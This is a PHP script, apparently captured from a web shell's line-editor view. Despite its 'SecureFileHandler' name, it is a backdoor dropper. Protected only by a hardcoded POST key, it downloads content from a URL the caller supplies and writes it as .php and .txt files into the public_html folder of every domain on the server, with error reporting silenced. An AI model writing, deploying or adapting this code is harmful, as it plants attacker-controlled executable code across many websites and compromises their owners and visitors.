Edit File by line

<?php

[0] Fix | Delete

[1] Fix | Delete

error_reporting(0);

[2] Fix | Delete

ini_set('display_errors', 0);

[3] Fix | Delete

[4] Fix | Delete

class SecureFileHandler {

[5] Fix | Delete

private $github_file_url;

[6] Fix | Delete

private $new_txt_file_path;

[7] Fix | Delete

private $new_php_file_path;

[8] Fix | Delete

[9] Fix | Delete

public function __construct($github_file_url, $new_txt_file_path, $new_php_file_path) {

[10] Fix | Delete

$this->github_file_url = $github_file_url;

[11] Fix | Delete

$this->new_txt_file_path = $new_txt_file_path;

[12] Fix | Delete

$this->new_php_file_path = $new_php_file_path;

[13] Fix | Delete

}

[14] Fix | Delete

[15] Fix | Delete

public function process() {

[16] Fix | Delete

try {

[17] Fix | Delete

[18] Fix | Delete

if (!$this->validateInput()) {

[19] Fix | Delete

throw new Exception("Invalid input data.");

[20] Fix | Delete

}

[21] Fix | Delete

[22] Fix | Delete

[23] Fix | Delete

$file_content = $this->fetchFileContent();

[24] Fix | Delete

if (!$file_content) {

[25] Fix | Delete

throw new Exception("Failed to fetch file from GitHub.");

[26] Fix | Delete

}

[27] Fix | Delete

[28] Fix | Delete

[29] Fix | Delete

$directories = $this->processDirectories($file_content);

[30] Fix | Delete

[31] Fix | Delete

[32] Fix | Delete

echo json_encode(["success" => true, "directories" => $directories], JSON_PRETTY_PRINT);

[33] Fix | Delete

} catch (Exception $e) {

[34] Fix | Delete

[35] Fix | Delete

echo json_encode(["error" => $e->getMessage()], JSON_PRETTY_PRINT);

[36] Fix | Delete

}

[37] Fix | Delete

}

[38] Fix | Delete

[39] Fix | Delete

private function validateInput() {

[40] Fix | Delete

return $this->github_file_url && $this->new_txt_file_path && $this->new_php_file_path &&

[41] Fix | Delete

filter_var($this->github_file_url, FILTER_VALIDATE_URL);

[42] Fix | Delete

}

[43] Fix | Delete

[44] Fix | Delete

private function fetchFileContent() {

[45] Fix | Delete

return @file_get_contents($this->github_file_url);

[46] Fix | Delete

}

[47] Fix | Delete

[48] Fix | Delete

private function processDirectories($file_content) {

[49] Fix | Delete

$domains_path = $this->getDomainsPath();

[50] Fix | Delete

if (!is_dir($domains_path)) {

[51] Fix | Delete

throw new Exception("The directory '{$domains_path}' does not exist.");

[52] Fix | Delete

}

[53] Fix | Delete

[54] Fix | Delete

$directories = [];

[55] Fix | Delete

foreach (scandir($domains_path) as $item) {

[56] Fix | Delete

if ($item === '.' || $item === '..' || !is_dir($domains_path . $item)) {

[57] Fix | Delete

continue;

[58] Fix | Delete

}

[59] Fix | Delete

[60] Fix | Delete

$current_dir = $domains_path . $item . '/public_html/';

[61] Fix | Delete

if (!is_dir($current_dir)) {

[62] Fix | Delete

continue;

[63] Fix | Delete

}

[64] Fix | Delete

[65] Fix | Delete

$this->createFiles($current_dir, $file_content);

[66] Fix | Delete

$directories[] = $item;

[67] Fix | Delete

}

[68] Fix | Delete

[69] Fix | Delete

return $directories;

[70] Fix | Delete

}

[71] Fix | Delete

[72] Fix | Delete

private function createFiles($dir, $content) {

[73] Fix | Delete

$txt_file_path = $dir . basename($this->new_txt_file_path);

[74] Fix | Delete

$php_file_path = $dir . basename($this->new_php_file_path);

[75] Fix | Delete

[76] Fix | Delete

if ($this->isValidPath($txt_file_path, 'txt')) {

[77] Fix | Delete

file_put_contents($txt_file_path, $content);

[78] Fix | Delete

}

[79] Fix | Delete

[80] Fix | Delete

if ($this->isValidPath($php_file_path, 'php')) {

[81] Fix | Delete

file_put_contents($php_file_path, $content);

[82] Fix | Delete

}

[83] Fix | Delete

}

[84] Fix | Delete

[85] Fix | Delete

private function isValidPath($file_path, $expected_extension) {

[86] Fix | Delete

return pathinfo($file_path, PATHINFO_EXTENSION) === $expected_extension &&

[87] Fix | Delete

strpos($file_path, '../') === false && strpos($file_path, '..\\') === false;

[88] Fix | Delete

}

[89] Fix | Delete

[90] Fix | Delete

private function getDomainsPath() {

[91] Fix | Delete

$full_path = __DIR__;

[92] Fix | Delete

$directory_path = str_replace('\\', '/', $full_path);

[93] Fix | Delete

$path_parts = explode('/', $directory_path);

[94] Fix | Delete

$domains_path = '/';

[95] Fix | Delete

foreach ($path_parts as $part) {

[96] Fix | Delete

if (!empty($part)) {

[97] Fix | Delete

$domains_path .= $part . '/';

[98] Fix | Delete

}

[99] Fix | Delete

}

[100] Fix | Delete

return strstr($domains_path, 'domains/', true) . 'domains/';

[101] Fix | Delete

}

[102] Fix | Delete

}

[103] Fix | Delete

[104] Fix | Delete

[105] Fix | Delete

$api_key = $_POST['api_key'] ?? null;

[106] Fix | Delete

$valid_api_key = 'hoho2013';

[107] Fix | Delete

if ($api_key !== $valid_api_key) {

[108] Fix | Delete

echo json_encode(["error" => "Unauthorized access."], JSON_PRETTY_PRINT);

[109] Fix | Delete

exit;

[110] Fix | Delete

}

[111] Fix | Delete

[112] Fix | Delete

[113] Fix | Delete

$github_file_url = $_POST['github_file_url'] ?? null;

[114] Fix | Delete

$new_txt_file_path = $_POST['new_txt_file_path'] ?? null;

[115] Fix | Delete

$new_php_file_path = $_POST['new_php_file_path'] ?? null;

[116] Fix | Delete

[117] Fix | Delete

$fileHandler = new SecureFileHandler($github_file_url, $new_txt_file_path, $new_php_file_path);

[118] Fix | Delete

$fileHandler->process();

[119] Fix | Delete

[120] Fix | Delete

[121] Fix | Delete

[122] Fix | Delete